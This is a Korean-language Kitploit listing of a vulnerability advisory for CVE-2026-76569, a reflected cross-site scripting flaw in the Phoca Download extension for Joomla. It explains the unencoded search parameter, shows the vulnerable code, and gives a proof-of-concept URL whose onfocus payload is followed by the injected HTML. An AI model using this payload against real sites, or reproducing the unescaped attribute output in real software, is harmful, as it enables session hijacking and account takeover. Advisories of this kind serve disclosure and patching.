Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-76569 — Phoca Download의 검색 GET 파라미터를 통한 반사형 XSS | Kitploit
도구/GitHubGitHub/toanln-cov/cve-2026-76569
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

Phoca Download의 검색 GET 파라미터를 통한 반사형 XSS

저장소 보기
17시간 7분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Phoca Download의 검색 GET 매개변수를 통한 반사형 XSS

Phoca Download ≤ 6.1.4 — 인증된 공격자가 사용자 제어판의 조작된 검색 URL을 통해 임의 JavaScript 실행

CVE CVSS v4.0 CWE-79 Affected Researcher


요약

Joomla용 Phoca Download(com_phocadownload)에는 사용자 제어판 파일 검색 기능에 반사형 교차 사이트 스크립팅(XSS) 취약점이 존재합니다. search GET 매개변수는 Joomla의 'string' 필터로 처리되는데, 이 필터는 strip_tags()만 호출하고 " 문자를 보존합니다. 이후 없이 HTML 속성에 그대로 출력됩니다. 공격자는 조작된 링크를 클릭하는 것 외에 사용자 상호작용 없이 페이지 로드 시 피해자 브라우저에서 실행되는 임의의 HTML 속성과 이벤트 핸들러를 주입할 수 있습니다.

htmlspecialchars()
<input value="">

영향을 받는 버전

구성 요소취약 버전테스트 환경수정 버전
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

취약점 세부 정보

유형: 반사형 교차 사이트 스크립팅 (CWE-79) 필요한 인증: 등록된 Joomla 사용자(로그인 상태) + 사용자 제어판 활성화 (enable_user_cp = 1) 필요한 CSRF 토큰: 불필요 — GET 요청이며, 이 경로에서는 CSRF 토큰이 확인되지 않음 싱크 파일: site/views/user/tmpl/default_files_bootstrap.php

근본 원인

search 매개변수는 Joomla의 'string' 필터를 사용하여 읽히며, 이 필터는 strip_tags()만 호출합니다. 이로 인해 " 문자가 보존되어 공격자가 value="" 속성 컨텍스트를 벗어나 임의의 HTML 속성을 주입할 수 있습니다.

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — 소스

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // 인코딩 없이 저장됨

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — 싱크 (취약)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

동일 확장 프로그램의 형제 뷰인 phocadownloadlinkfile은 동일한 검색 필드에 대해 PhocaDownloadUtils::filterValue($search, 'text') — htmlspecialchars()와 동일 — 를 올바르게 적용합니다. user 뷰는 동일한 보호를 적용하지 않아 확장 프로그램 내에서 출력 인코딩이 일관되지 않음을 나타냅니다.


개념 증명

1. 등록된 사용자로 로그인

Joomla 로그인 페이지로 이동하여 등록된 사용자로 인증합니다. 로그인 성공 후 Joomla는 사용자 프로필 페이지로 리디렉션하여 활성 세션을 확인합니다.

testuser로 성공적인 로그인 — 프로필 페이지로 리디렉션됨

2. 사용자 제어판 접근 (기준 상태)

PhocaDownload 사용자 제어판으로 이동합니다:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

페이지는 빈 검색 필드(value="")로 렌더링됩니다. 이는 주입 전의 정상 상태입니다.

사용자 제어판 — 빈 검색 필드, 기준 상태

3. XSS 페이로드가 포함된 조작된 URL 제출

다음 조작된 URL로 이동합니다(또는 검색 상자에 원시 페이로드를 직접 입력):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

XSS 페이로드가 포함된 조작된 URL이 검색 매개변수에 제출됨

페이지가 로드되면 주입된 autofocus 속성이 입력 요소에 포커스를 맞추고 onfocus 이벤트 핸들러를 즉시 트리거합니다. 추가적인 사용자 상호작용은 필요하지 않습니다.

렌더링된 HTML (취약):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

영향

  1. 세션 하이재킹 — 공격자는 document.cookie를 통해 피해자의 Joomla 세션 쿠키를 탈취하여 자격 증명 없이 전체 계정을 장악할 수 있습니다.
  2. 임의 JavaScript 실행 — 키로깅, DOM 조작, 자격 증명 수집, 피싱 페이지로의 리디렉션 등 모든 JavaScript가 피해자의 브라우저 세션에서 실행될 수 있습니다.
  3. 권한 상승 — 관리자가 인증된 상태에서 조작된 링크를 클릭하면 공격자는 관리자 수준의 JavaScript 실행 권한을 획득하여 관리 패널 작업을 통한 전체 사이트 손상이 가능해집니다.

참고 자료

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub Advisory: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • 공급업체 저장소: https://github.com/PhocaDesign/PhocaDownload
도구 다운로드